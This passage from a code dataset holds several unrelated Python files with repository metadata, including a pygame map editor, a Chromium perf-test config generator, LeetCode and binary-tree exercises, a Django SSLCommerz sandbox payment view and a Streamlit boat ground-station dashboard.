self.asset_manager = EditorAssetManager(self.asset_manager_size, self.toolbar_h, self.font)\n\n self.map_manager_w = self.canvas_size[0]-self.asset_manager_w\n self.map_manager_h = self.canvas_size[1]-self.toolbar_h\n self.map_manager_size = (self.map_manager_w, self.map_manager_h)\n self.map_size = (640, 352)\n self.map_manager = EditorMapManager(self.map_manager_size, self.map_size, self.asset_manager_w, self.toolbar_h, self.font)\n \n def run(self) -> None:\n while self.running:\n self.events()\n self.update()\n self.render()\n self.clock.tick(self.fps)\n time.sleep(1/self.fps)\n\n pg.quit()\n sys.exit()\n\n def events(self) -> None:\n # update mouse position\n self.mouse.data['pos'] = (pg.mouse.get_pos()[0]/self.ratio[0], pg.mouse.get_pos()[1]/self.ratio[1])\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.running = 0\n\n # handle mouse event\n if event.type == pg.MOUSEBUTTONDOWN:\n if event.button == 1: # left click down\n self.mouse.data['l_click'] = 1\n self.mouse.data['l_clicking'] = 1\n if event.button == 3: # right click down\n self.mouse.data['r_click'] = 1\n self.mouse.data['r_clicking'] = 1\n if event.type == pg.MOUSEBUTTONUP:\n if event.button == 1: # left click up\n self.mouse.data['l_clicking'] = 0\n if event.button == 3: # right click up\n self.mouse.data['r_clicking'] = 0\n\n # handle keyboard event\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_LEFT:\n self.keyboard.data['arrow keys']['left'] = 1\n if event.key == pg.K_RIGHT:\n self.keyboard.data['arrow keys']['right'] = 1\n if event.key == pg.K_UP:\n self.keyboard.data['arrow keys']['up'] = 1\n if event.key == pg.K_DOWN:\n self.keyboard.data['arrow keys']['down'] = 1\n if event.key == pg.K_a:\n self.keyboard.data['regular keys']['a'] = 1\n if event.key == pg.K_b:\n self.keyboard.data['regular keys']['b'] = 1\n if event.key == pg.K_c:\n self.keyboard.data['regular keys']['c'] = 1\n if event.key == pg.K_d:\n self.keyboard.data['regular keys']['d'] = 1\n if event.key == pg.K_e:\n self.keyboard.data['regular keys']['e'] = 1\n if event.key == pg.K_f:\n self.keyboard.data['regular keys']['f'] = 1\n if event.key == pg.K_g:\n self.keyboard.data['regular keys']['g'] = 1\n if event.key == pg.K_h:\n self.keyboard.data['regular keys']['h'] = 1\n if event.key == pg.K_i:\n self.keyboard.data['regular keys']['i'] = 1\n if event.key == pg.K_j:\n self.keyboard.data['regular keys']['j'] = 1\n if event.key == pg.K_k:\n self.keyboard.data['regular keys']['k'] = 1\n if event.key == pg.K_l:\n self.keyboard.data['regular keys']['l'] = 1\n if event.key == pg.K_m:\n self.keyboard.data['regular keys']['m'] = 1\n if event.key == pg.K_n:\n self.keyboard.data['regular keys']['n'] = 1\n if event.key == pg.K_o:\n self.keyboard.data['regular keys']['o'] = 1\n if event.key == pg.K_p:\n self.keyboard.data['regular keys']['p'] = 1\n if event.key == pg.K_q:\n self.keyboard.data['regular keys']['q'] = 1\n if event.key == pg.K_r:\n self.keyboard.data['regular keys']['r'] = 1\n if event.key == pg.K_s:\n self.keyboard.data['regular keys']['s'] = 1\n if event.key == pg.K_t:\n self.keyboard.data['regular keys']['t'] = 1\n if event.key == pg.K_u:\n self.keyboard.data['regular keys']['u'] = 1\n if event.key == pg.K_v:\n self.keyboard.data['regular keys']['v'] = 1\n if event.key == pg.K_w:\n self.keyboard.data['regular keys']['w'] = 1\n if event.key == pg.K_x:\n self.keyboard.data['regular keys']['x'] = 1\n if event.key == pg.K_y:\n self.keyboard.data['regular keys']['y'] = 1\n if event.key == pg.K_z:\n self.keyboard.data['regular keys']['z'] = 1\n if event.key == pg.K_SPACE:\n self.keyboard.data['regular keys'][' '] = 1\n if event.key == pg.K_ESCAPE:\n self.keyboard.data['special keys']['esc'] = 1\n if event.key == pg.K_DELETE or event.key == pg.K_BACKSPACE:\n self.keyboard.data['regular keys']['del'] = 1\n if event.key == pg.K_0:\n self.keyboard.data['regular keys']['0'] = 1\n if event.key == pg.K_1:\n self.keyboard.data['regular keys']['1'] = 1\n if event.key == pg.K_2:\n self.keyboard.data['regular keys']['2'] = 1\n if event.key == pg.K_3:\n self.keyboard.data['regular keys']['3'] = 1\n if event.key == pg.K_4:\n self.keyboard.data['regular keys']['4'] = 1\n if event.key == pg.K_5:\n self.keyboard.data['regular keys']['5'] = 1\n if event.key == pg.K_6:\n self.keyboard.data['regular keys']['6'] = 1\n if event.key == pg.K_7:\n self.keyboard.data['regular keys']['7'] = 1\n if event.key == pg.K_8:\n self.keyboard.data['regular keys']['8'] = 1\n if event.key == pg.K_9:\n self.keyboard.data['regular keys']['9'] = 1\n\n if event.type == pg.KEYUP:\n if event.key == pg.K_LEFT:\n self.keyboard.data['arrow keys']['left'] = 0\n if event.key == pg.K_RIGHT:\n self.keyboard.data['arrow keys']['right'] = 0\n if event.key == pg.K_UP:\n self.keyboard.data['arrow keys']['up'] = 0\n if event.key == pg.K_DOWN:\n self.keyboard.data['arrow keys']['down'] = 0\n\n def update(self) -> None:\n self.canvas.fill(COLOURS['blue 3']) # wipe canvas for new frame\n \n # update objects\n self.toolbar.update(self.mouse.data, self.keyboard.data)\n self.asset_manager.update(self.mouse.data)\n self.map_manager.update(self.mouse.data, self.keyboard.data, self.asset_manager.get_data(), self.toolbar.get_data(), self.toolbar)\n self.mouse.reset_click_status()\n self.keyboard.reset_key_status()\n\n def render(self) -> None:\n # render objects\n # render stack - bottom\n self.map_manager.render(self.canvas)\n self.asset_manager.render(self.canvas)\n self.toolbar.render(self.canvas)\n # render stack - top\n\n # blit canvas to screen and update display\n self.screen.blit(pg.transform.scale(self.canvas, self.screen_size), (0,0))\n pg.display.update()","repo_name":"Teorija/PgEditor","sub_path":"pg_editor.py","file_name":"pg_editor.py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24663896145","text":"import json\nimport os\nimport sys\n\nfrom chrome_telemetry_build import chromium_config\n\nsys.path.append(chromium_config.GetTelemetryDir())\nfrom telemetry import benchmark as benchmark_module\nfrom telemetry.core import discover\nfrom telemetry.util import bot_utils\n\n\nSCRIPT_TESTS = [\n {\n 'args': [\n 'gpu_perftests',\n '--adb-path',\n 'src/third_party/catapult/devil/bin/deps/linux2/x86_64/bin/adb',\n ],\n 'name': 'gpu_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Android Nexus5 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus7v2 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus9 Perf',\n 'shards': [2]\n }\n ],\n 'chromium.perf.fyi': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [1]\n },\n ]\n }\n },\n {\n 'args': [\n 'cc_perftests',\n '--adb-path',\n 'src/third_party/catapult/devil/bin/deps/linux2/x86_64/bin/adb',\n ],\n 'name': 'cc_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Android Nexus5 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus6 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus7v2 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus9 Perf',\n 'shards': [2]\n },\n ],\n 'chromium.perf.fyi': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [1]\n },\n ]\n }\n },\n {\n 'args': [\n 'cc_perftests',\n '--test-launcher-print-test-stdio=always'\n ],\n 'name': 'cc_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Linux Perf',\n 'shards': [3]\n },\n ]\n }\n },\n {\n 'args': [\n 'tracing_perftests',\n '--test-launcher-print-test-stdio=always'\n ],\n 'name': 'tracing_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Linux Perf',\n 'shards': [3]\n },\n ]\n }\n },\n {\n 'args': [\n 'load_library_perf_tests',\n '--test-launcher-print-test-stdio=always'\n ],\n 'name': 'load_library_perf_tests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Linux Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 ATI GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Nvidia GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 x64 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 8 Perf',\n 'shards': [2]\n },\n ]\n }\n },\n {\n 'args': [\n 'performance_browser_tests',\n '--test-launcher-print-test-stdio=always',\n '--gtest_filter=TabCapturePerformanceTest.*:CastV2PerformanceTest.*',\n '--test-launcher-jobs=1',\n '--enable-gpu'\n ],\n 'name': 'performance_browser_tests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Mac 10.8 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Mac 10.9 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 ATI GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Nvidia GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 x64 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 8 Perf',\n 'shards': [2]\n },\n ]\n }\n },\n {\n 'args': [\n 'angle_perftests',\n '--test-launcher-print-test-stdio=always',\n '--test-launcher-jobs=1'\n ],\n 'name': 'angle_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Win 7 ATI GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Nvidia GPU Perf',\n 'shards': [2]\n },\n ]\n }\n },\n]\n\ndef add_tester(waterfall, name, perf_id, platform, target_bits=64,\n num_host_shards=1, num_device_shards=1, swarming=None):\n del perf_id # this will be needed\n waterfall['testers'][name] = {\n 'platform': platform,\n 'num_device_shards': num_device_shards,\n 'num_host_shards': num_host_shards,\n 'target_bits': target_bits,\n }\n\n if swarming:\n waterfall['testers'][name]['swarming_dimensions'] = swarming\n waterfall['testers'][name]['swarming'] = True\n\n return waterfall\n\ndef get_fyi_waterfall_config():\n waterfall = {'builders':[], 'testers': {}}\n waterfall = add_tester(\n waterfall, 'Android Galaxy S5 Perf',\n 'android-galaxy-s5-perf', 'android')\n waterfall = add_tester(\n waterfall, 'Win 10 Low-End Perf Tests',\n 'win-low-end-2-core', 'win',\n swarming=[\n {\n 'gpu': '1002:9874',\n 'os': 'Windows-10-10586',\n 'device_ids': ['build171-b4', 'build186-b4']\n }\n ])\n return waterfall\n\ndef get_waterfall_config():\n waterfall = {'builders':[], 'testers': {}}\n\n # These configurations are taken from chromium_perf.py in\n # build/scripts/slave/recipe_modules/chromium_tests and must be kept in sync\n # to generate the correct json for each tester\n waterfall = add_tester(\n waterfall, 'Android Galaxy S5 Perf',\n 'android-galaxy-s5', 'android', target_bits=32,\n num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus5 Perf', 'android-nexus5',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus5X Perf', 'android-nexus5X',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus6 Perf', 'android-nexus6',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus7v2 Perf', 'android-nexus7v2',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus9 Perf', 'android-nexus9',\n 'android', num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android One Perf', 'android-one',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n\n waterfall = add_tester(\n waterfall, 'Win Zenbook Perf', 'win-zenbook', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 10 Perf', 'chromium-rel-win10', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 8 Perf', 'chromium-rel-win8-dual', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 Perf', 'chromium-rel-win7-dual',\n 'win', target_bits=32, num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 x64 Perf',\n 'chromium-rel-win7-x64-dual', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 ATI GPU Perf',\n 'chromium-rel-win7-gpu-ati', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 Intel GPU Perf',\n 'chromium-rel-win7-gpu-intel', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 Nvidia GPU Perf',\n 'chromium-rel-win7-gpu-nvidia', 'win', num_host_shards=5)\n\n waterfall = add_tester(\n waterfall, 'Mac 10.11 Perf', 'chromium-rel-mac11',\n 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac 10.10 Perf', 'chromium-rel-mac10',\n 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac Retina Perf',\n 'chromium-rel-mac-retina', 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac HDD Perf', 'chromium-rel-mac-hdd', 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac Pro 10.11 Perf',\n 'chromium-rel-mac11-pro', 'mac',\n swarming=[\n {\n 'gpu': '1002:6821',\n 'os': 'Mac-10.11',\n 'device_ids': [\n 'build128-b1', 'build129-b1',\n 'build130-b1', 'build131-b1', 'build132-b1'\n ]\n }\n ])\n waterfall = add_tester(\n waterfall, 'Mac Air 10.11 Perf',\n 'chromium-rel-mac11-air', 'mac',\n swarming=[\n {\n 'gpu': '8086:1626',\n 'os': 'Mac-10.11',\n 'device_ids': [\n 'build123-b1', 'build124-b1',\n 'build125-b1', 'build126-b1', 'build127-b1'\n ]\n }\n ])\n\n waterfall = add_tester(\n waterfall, 'Linux Perf', 'linux-release', 'linux', num_host_shards=5)\n\n return waterfall\n\ndef generate_telemetry_test(swarming_dimensions, benchmark_name, browser):\n # The step name must end in 'test' or 'tests' in order for the\n # results to automatically show up on the flakiness dashboard.\n # (At least, this was true some time ago.) Continue to use this\n # naming convention for the time being to minimize changes.\n\n test_args = [\n benchmark_name,\n '-v',\n '--upload-results',\n '--output-format=chartjson',\n '--browser=%s' % browser\n ]\n # When this is enabled on more than just windows machines we will need\n # --device=android\n\n step_name = benchmark_name\n if browser == 'reference':\n test_args.append('--output-trace-tag=_ref')\n step_name += '.reference'\n\n swarming = None\n if swarming_dimensions:\n swarming = {\n # Always say this is true regardless of whether the tester\n # supports swarming. It doesn't hurt.\n 'can_use_on_swarming_builders': True,\n 'expiration': 14400,\n 'dimension_sets': swarming_dimensions\n }\n\n result = {\n 'args': test_args,\n 'isolate_name': 'telemetry_perf_tests',\n 'name': step_name,\n 'override_compile_targets': ['telemetry_perf_tests'],\n }\n if swarming:\n result['swarming'] = swarming\n\n return result\n\ndef script_test_enabled_on_tester(master, test, tester_name, shard):\n for enabled_tester in test['testers'].get(master, []):\n if enabled_tester['name'] == tester_name:\n if shard in enabled_tester['shards']:\n return True\n return False\n\ndef generate_script_tests(master, tester_name, shard):\n script_tests = []\n for test in SCRIPT_TESTS:\n if script_test_enabled_on_tester(master, test, tester_name, shard):\n script = {\n 'args': test['args'],\n 'name': test['name'],\n 'script': test['script']\n }\n script_tests.append(script)\n return script_tests\n\ndef generate_telemetry_tests(tester_config, benchmarks):\n isolated_scripts = []\n # First determine the browser that you need based on the tester\n browser_name = ''\n if tester_config['platform'] == 'android':\n browser_name = 'android-chromium'\n elif (tester_config['platform'] == 'win'\n and tester_config['target_bits'] == 64):\n browser_name = 'release_x64'\n else:\n browser_name ='release'\n\n for benchmark in benchmarks:\n # First figure out swarming dimensions this test needs to be triggered on.\n # For each set of dimensions it is only triggered on one of the devices\n swarming_dimensions = []\n for dimension in tester_config['swarming_dimensions']:\n device_affinity = bot_utils.GetDeviceAffinity(\n len(dimension['device_ids']), benchmark.Name())\n\n device_id = dimension['device_ids'][device_affinity]\n # Id is unique within the swarming pool so it is the only needed\n # identifier for the bot to run the test on\n swarming_dimensions.append({\n 'id': device_id,\n 'gpu': dimension['gpu'],\n 'os': dimension['os'],\n 'pool': 'Chrome-perf',\n })\n\n test = generate_telemetry_test(\n swarming_dimensions, benchmark.Name(), browser_name)\n isolated_scripts.append(test)\n # Now create another executable for this benchmark on the reference browser\n reference_test = generate_telemetry_test(\n swarming_dimensions, benchmark.Name(),'reference')\n isolated_scripts.append(reference_test)\n\n return isolated_scripts\n\n\nBENCHMARK_NAME_WHITELIST = set([\n u'smoothness.top_25_smooth',\n u'sunspider',\n u'system_health.webview_startup',\n u'page_cycler_v2.intl_hi_ru',\n u'dromaeo.cssqueryjquery',\n])\n\n# List of benchmarks that are to never be run on a waterfall.\nBENCHMARK_NAME_BLACKLIST = [\n 'multipage_skpicture_printer',\n 'multipage_skpicture_printer_ct',\n 'rasterize_and_record_micro_ct',\n 'repaint_ct',\n 'multipage_skpicture_printer',\n 'multipage_skpicture_printer_ct',\n 'skpicture_printer',\n 'skpicture_printer_ct',\n]\n\ndef current_benchmarks(use_whitelist):\n current_dir = os.path.dirname(__file__)\n benchmarks_dir = os.path.join(current_dir, 'benchmarks')\n top_level_dir = os.path.dirname(benchmarks_dir)\n\n all_benchmarks = discover.DiscoverClasses(\n benchmarks_dir, top_level_dir, benchmark_module.Benchmark,\n index_by_class_name=True).values()\n # Remove all blacklisted benchmarks\n for blacklisted in BENCHMARK_NAME_BLACKLIST:\n for benchmark in all_benchmarks:\n if benchmark.Name() == blacklisted:\n all_benchmarks.remove(benchmark)\n break\n\n if use_whitelist:\n all_benchmarks = (\n bench for bench in all_benchmarks\n if bench.Name() in BENCHMARK_NAME_WHITELIST)\n return sorted(all_benchmarks, key=lambda b: b.Name())\n\n\ndef generate_all_tests(waterfall, use_whitelist):\n tests = {}\n for builder in waterfall['builders']:\n tests[builder] = {}\n all_benchmarks = current_benchmarks(use_whitelist)\n\n for name, config in waterfall['testers'].iteritems():\n if config.get('swarming', False):\n # Right now we are only generating benchmarks for the fyi waterfall\n isolated_scripts = generate_telemetry_tests(config, all_benchmarks)\n tests[name] = {\n 'isolated_scripts': sorted(isolated_scripts, key=lambda x: x['name'])\n }\n else:\n # scripts are only currently run in addition to the main waterfall. They\n # are currently the only thing generated in the perf json file.\n # TODO eyaich: will need to handle the sharding differently when we have\n # swarmed bots on the main waterfall.\n for shard in range(0, config['num_host_shards']):\n tester_name = '%s (%d)' % (name, shard + 1)\n scripts = generate_script_tests(waterfall['name'], name, shard + 1)\n if scripts:\n tests[tester_name] = {\n 'scripts': sorted(scripts, key=lambda x: x['name'])\n }\n\n tests['AAAAA1 AUTOGENERATED FILE DO NOT EDIT'] = {}\n tests['AAAAA2 See //tools/perf/generate_perf_json.py to make changes'] = {}\n filename = '%s.json' % waterfall['name']\n\n current_dir = os.path.dirname(os.path.abspath(__file__))\n src_dir = os.path.dirname(os.path.dirname(current_dir))\n\n with open(os.path.join(src_dir, 'testing', 'buildbot', filename), 'w') as fp:\n json.dump(tests, fp, indent=2, separators=(',', ': '), sort_keys=True)\n fp.write('\\n')\n\n\ndef main():\n waterfall = get_waterfall_config()\n waterfall['name'] = 'chromium.perf'\n fyi_waterfall = get_fyi_waterfall_config()\n fyi_waterfall['name'] = 'chromium.perf.fyi'\n\n generate_all_tests(fyi_waterfall, True)\n generate_all_tests(waterfall, False)\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"briantruong777/quic-inverse-multiplex","sub_path":"src/tools/perf/generate_perf_json.py","file_name":"generate_perf_json.py","file_ext":"py","file_size_in_byte":15557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18908762264","text":"import re\na = input()\nls = a.split(\"_\")\nprint(ls[0] + \"\".join(ls[i].capitalize() for i in range(1, len(ls))))\n\n# camel = \"\"\n# i = 0\n# while (i!=len(a)):\n# if (a[i]==\"_\"):\n# camel += a[i] + a[i+1].upper()\n# i+=2\n# else:\n# camel += a[i]\n# i += 1\n\n# print (re.sub(\"_\", \"\", camel))\n# print(a.split(\"_\"))\n","repo_name":"Aminochka4/pp2","sub_path":"lab 5/RegEx/A7.py","file_name":"A7.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39659007930","text":"import unittest\nfrom typing import List\nfrom pprint import pprint\nimport math\n\nclass Solution1:\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n # LTE - O(len(heights)*ladders)\n dp = [0]*(ladders+1)\n i = 0\n while i < len(heights)-1:\n h, n = heights[i], heights[i+1]\n if h < n:\n d = n-h\n nxt = [0]*(ladders+1)\n if dp[0] + d <= bricks:\n nxt[0] = dp[0] + d\n else:\n nxt[0] = math.inf\n for j in range(1, ladders+1):\n if dp[j] + d <= bricks:\n nxt[j] = min(dp[j-1], dp[j]+d) \n else:\n nxt[j] = dp[j-1]\n if not any(l < math.inf for l in nxt):\n break\n dp = nxt\n i += 1\n return i\n\nimport heapq\nclass Solution:\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n L = len(heights)\n res = 0\n h = []\n while res < L-1:\n hi, hn = heights[res], heights[res+1]\n diff = hn - hi\n if diff > 0:\n heapq.heappush(h, -diff)\n bricks -= diff\n if bricks < 0:\n if ladders == 0:\n return res\n else:\n ladders -= 1\n bricks -= heapq.heappop(h)\n res += 1\n return res\n\nclass TestSolution(unittest.TestCase):\n\n def test_case_1(self):\n sol = Solution()\n heights = [4,2,7,6,9,14,12]\n bricks = 5\n ladders = 1\n expected = 4\n self.assertEqual(sol.furthestBuilding(heights, bricks, ladders), expected)\n\n def test_case_2(self):\n sol = Solution()\n heights = [4,12,2,7,3,18,20,3,19]\n bricks = 10\n ladders = 2\n expected = 7\n self.assertEqual(sol.furthestBuilding(heights, bricks, ladders), expected)\n \n # def test_edge_case_1(self):\n # sol = Solution()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EdisonChendi/leetcodeshuashuashua","sub_path":"meiriyiti/us/1642_furthest_building_you_can_reach.py","file_name":"1642_furthest_building_you_can_reach.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4408865884","text":"#display as per level order\nfrom typing import Counter\n\n\ndef DisplayTree(rootNode):\n if rootNode is None:\n return\n que = []\n que.append(rootNode)\n while len(que) != 0 :\n currentRoot = que.pop(0)\n print(currentRoot.data)\n if currentRoot.left is not None:\n que.append(currentRoot.left)\n if currentRoot.right is not None:\n que.append(currentRoot.right)\n\n\n\nclass BinaryTree:\n def __init__(self,data):\n self.left = None\n self.data = data\n self.right = None\n \ndef insert(rootNode, newNode):\n if not rootNode:\n rootNode = newNode\n else:\n customQueue = []\n customQueue.append(rootNode)\n while len(customQueue) != 0:\n root = customQueue.pop(0)\n if root.left is not None:\n customQueue.append(root.left)\n else:\n root.left = newNode\n return \"Successfully Inserted\"\n if root.right is not None:\n customQueue.append(root.right)\n else:\n root.right= newNode\n return \"Successfully Inserted\"\n\nroot = BinaryTree(\"A\")\ninsert(root,BinaryTree(\"B\"))\ninsert(root,BinaryTree(\"C\"))\ninsert(root,BinaryTree(\"D\"))\ninsert(root,BinaryTree(\"E\"))\ninsert(root,BinaryTree(\"F\"))\ninsert(root,BinaryTree(\"G\"))\n# DisplayTree(root)\n\nprint(root.data)\nprint(root.left.data,\"\\t\",root.right.data)\nprint(root.left.left.data,root.left.right.data,end=\"\")\nprint(\"\\t\",root.right.left.data,root.right.right.data)","repo_name":"Rakeshyakkundi/DSA","sub_path":"BinaryTreeInsertion.py","file_name":"BinaryTreeInsertion.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36921341205","text":"\"\"\"config URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom pprint import pprint\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom sslcommerz_lib import SSLCOMMERZ\nssl_settings = {\n 'store_id': 'yourstoreid',\n 'store_pass': 'yourstorepassword',\n 'issandbox': True\n}\n\n\ndef pay_wit_ssl_commerz(request):\n sslcommerz = SSLCOMMERZ(ssl_settings)\n\n post_body = {}\n post_body['total_amount'] = 100.26\n post_body['currency'] = \"BDT\"\n post_body['tran_id'] = \"12345\"\n post_body['success_url'] = \"https://tareqmonwer.com\"\n post_body['fail_url'] = \"www.erpbud.com/blog/\"\n post_body['cancel_url'] = \"www.erpbud.com\"\n post_body['emi_option'] = 0\n post_body['cus_name'] = \"test\"\n post_body['cus_email'] = \"test@test.com\"\n post_body['cus_phone'] = \"01700000000\"\n post_body['cus_add1'] = \"customer address\"\n post_body['cus_city'] = \"Dhaka\"\n post_body['cus_country'] = \"Bangladesh\"\n post_body['shipping_method'] = \"NO\"\n post_body['num_of_item'] = 1\n post_body['product_name'] = \"Test\"\n post_body['product_category'] = \"Test Category\"\n post_body['product_profile'] = \"general\"\n\n response = sslcommerz.createSession(post_body)\n pprint(response)\n\n if response['status'] == 'SUCCESS':\n return HttpResponseRedirect(response['GatewayPageURL'])\n return HttpResponse(response)\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('pay', pay_wit_ssl_commerz, name='payment'),\n]\n","repo_name":"TareqMonwer/Django-SSL-Commerz-Integ","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"10724482921","text":"# streamlit run .\\Desktop\\python_tests\\streamlit_web_app.py\r\n\r\nimport streamlit as st\r\nimport time\r\nimport requests\r\nimport json\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport plost\r\nfrom PIL import Image\r\n\r\n# ------------------------------ Page setting ------------------------------\r\nst.set_page_config( page_title = \"THE F.I.R.S.T\",\r\n\t\t\t\t\tlayout = \"wide\")\r\nst.title(\"--- Ground Control Station ---\")\r\nst.markdown(\"#\")\r\n\r\n# ------------------------------ Initialization ------------------------------\r\n\r\n# ------- Variables -------\r\nusv_data = 0\r\nprint_data = 0\r\n\r\ncontrol_panel_header = st.empty()\r\ndisplay_header = st.empty()\r\ncontrol_board = st.empty()\r\ndisplay_section = st.empty()\r\n\r\nmode = \"\"\r\nlat = 0\r\nlng = 0\r\n\r\n# ------------------------------ Interactive content ------------------------------\r\nwith control_panel_header:\r\n\tst.header(\"Control panel\")\r\n# ---------------- Control board ----------------\r\ncontrol_board.empty()\r\nwith control_board.container():\r\n\tmode = st.selectbox('Mode',('Waypoints','Zigzac path'), key=1)\r\n\tst.write('Selected mode: ', mode)\r\n\tlat = st.number_input('Waypoint latitude', key=2)\r\n\tst.write('Selected latitude: ', lat)\r\n\tlng = st.number_input('Waypoint longitude', key=3)\r\n\tst.write('Selected longitude: ', lng)\r\n\r\n\r\n\r\n# ---------------------------------------- WHILE LOOP ----------------------------------------\r\n# ----------------------------------------............----------------------------------------\r\nwhile True:\r\n\r\n\t# ----------------------------- Data requests -----------------------------\r\n\trep_obj = requests.get(\"http://127.0.0.1:8000/get_data/motor\")\r\n\trep_content = rep_obj.json()[0]\r\n\trep_text = json.dumps(rep_content) \r\n\r\n\t# ----------------------------- Data manipulation -----------------------------\r\n\tprint(rep_text)\r\n\tusv_data = int(rep_text)\r\n\tprint_data = usv_data * 2 \r\n\r\n\t# ------------------------------ Read-only content ------------------------------\r\n\twith display_header:\r\n\t\tst.header(\"USV's Data\")\r\n\r\n\t# ---------------- USV's states ----------------\r\n\tdisplay_section.empty()\r\n\twith display_section.container():\r\n\t\tst.subheader(\"Motor 1 = {}\".format(print_data))\r\n\r\n","repo_name":"6038-in-Git/usv_ground_station","sub_path":"streamlit_web_app.py","file_name":"streamlit_web_app.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20762312068","text":"print('n = ', end = '')\ntry:\n\tn = int(input())\nexcept:\n\t\tn = 100\nif n < 1:\n\tn = 100\nprint('')\nfor i in range(n):\n\tif (i+1)%15 == 0:\n\t\tprint('Fizz Buzz')\n\telif (i+1)%5 == 0:\n\t\tprint('Buzz')\n\telif (i+1)%3 == 